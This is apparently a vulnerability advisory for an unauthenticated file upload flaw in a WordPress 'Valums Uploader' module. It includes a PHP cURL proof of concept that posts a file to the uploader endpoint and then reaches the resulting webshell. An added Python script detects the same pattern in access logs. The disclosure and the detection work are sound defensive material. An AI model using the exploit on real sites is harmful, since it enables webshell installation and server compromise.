WordPress Valums Uploader Arbitrary File Uploading Vulnerability
Abstract:
=========
The independent laboratory researcher (jingo-bd) discovered a remote file upload vulnerability in the WordPress `Valums Uploader` application.
=======================
Remote
Severity:
=========
High
Details:
========
A file upload vulnerability was detected in the WordPress `Valums Uploader` application module. The vulnerability allows remote attackers to upload files such as webshells and then access them without authorization after the upload, compromising the application system.
The vulnerability is located in the Valums uploader module when it processes upload requests sent via POST.
Attackers can upload their own files without authorization to compromise the web application or the system DBMS.
Exploitation of the file upload vulnerability requires no user interaction and can be carried out without a privileged application user account. Successful exploitation of the remote file upload vulnerability results in system and DBMS compromise.
Proof of Concept:
=================
The remote vulnerability can be exploited by remote attackers without user interaction and without a privileged application user account.
For demonstration or to reproduce::

    <?php
    // Local file to upload; the PoC expects it in the current directory.
    $uploadfile = "bangla.php";
    // VALUMS_UPLOADER_PATH is a placeholder for the plugin's install directory.
    $ch = curl_init("http://localhost/wordpress/VALUMS_UPLOADER_PATH/php.php");
    curl_setopt($ch, CURLOPT_POST, true);
    // 'qqfile' is the uploader's form field; the '@' prefix is the legacy cURL
    // file-upload syntax, removed in later PHP versions.
    curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile' => "@$uploadfile"));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch);
    print "$postResult";
    ?>
Shell Access: http://localhost/wp-content/uploads/2013/01/bangla.php
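Added defender-side example, not part of the advisory: a Python script that scans web server access logs for the pattern the advisory describes (a POST to the uploader's `php.php` endpoint followed by a request for a `.php` file under `wp-content/uploads/`) and also flags any script request under that directory on its own. The log lines are constructed, and `VALUMS_UPLOADER_PATH` is the advisory's own placeholder for the plugin directory.

```python
import re
from datetime import datetime, timedelta

# Fields needed from an Apache/nginx "combined" access-log line: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Server-side script extensions that should never be served from the uploads directory.
SCRIPT_EXT_RE = re.compile(r'\.(php\d?|phtml|phar)(\?.*)?$', re.IGNORECASE)
UPLOADS_PREFIX = '/wp-content/uploads/'
# The advisory names the endpoint php.php but leaves the plugin directory as a placeholder, so match on the file name.
UPLOADER_ENDPOINT = '/php.php'
# Constructed sample log (not from the advisory); VALUMS_UPLOADER_PATH is the advisory's placeholder.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Jan/2013:10:15:01 +0000] "POST /wordpress/VALUMS_UPLOADER_PATH/php.php HTTP/1.1" 200 51 "-" "curl/7.26.0"
203.0.113.5 - - [12/Jan/2013:10:15:03 +0000] "GET /wp-content/uploads/2013/01/bangla.php HTTP/1.1" 200 312 "-" "curl/7.26.0"
198.51.100.7 - - [12/Jan/2013:10:16:40 +0000] "GET /wp-content/uploads/2013/01/photo.jpg HTTP/1.1" 200 8817 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Jan/2013:10:17:02 +0000] "GET /wp-content/uploads/2012/11/old.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Parse one access-log line into a dict, or return None when it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    rec['status'] = int(rec['status'])
    return rec

def detect(log_text, window=timedelta(minutes=5)):
    """Flag script requests under uploads/ and correlate each with a preceding uploader POST from the same IP."""
    alerts = []
    last_upload_post = {}  # ip -> timestamp of its most recent POST to the uploader endpoint
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec['method'] == 'POST' and rec['path'].split('?')[0].endswith(UPLOADER_ENDPOINT):
            last_upload_post[rec['ip']] = rec['ts']
            continue
        if UPLOADS_PREFIX in rec['path'] and SCRIPT_EXT_RE.search(rec['path']):
            alert = {'ip': rec['ip'], 'path': rec['path'], 'status': rec['status'], 'rule': 'script_in_uploads'}
            prior = last_upload_post.get(rec['ip'])
            if prior is not None and timedelta(0) <= rec['ts'] - prior <= window:
                alert['rule'] = 'upload_then_execute'  # upload followed by execution within the window
            alerts.append(alert)
    return alerts
```

Running `detect(SAMPLE_LOG)` on the constructed log yields two alerts: the correlated upload-then-execute sequence from the first client, and a standalone probe for a `.php` file under uploads from another client.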
Risk:
=====
The security risk of the unauthorized shell upload exploit is estimated as high(+).
Credits:
========
JingoBD - (http://facebook.com/bdcyberarmy)
Greetz: ManInDark,Rex0Man,Evil AXE,Bedu33n,NEEL,AXIOM, All Of My BCA Friends and BANGLADESHI Hacker Team.
References:
===========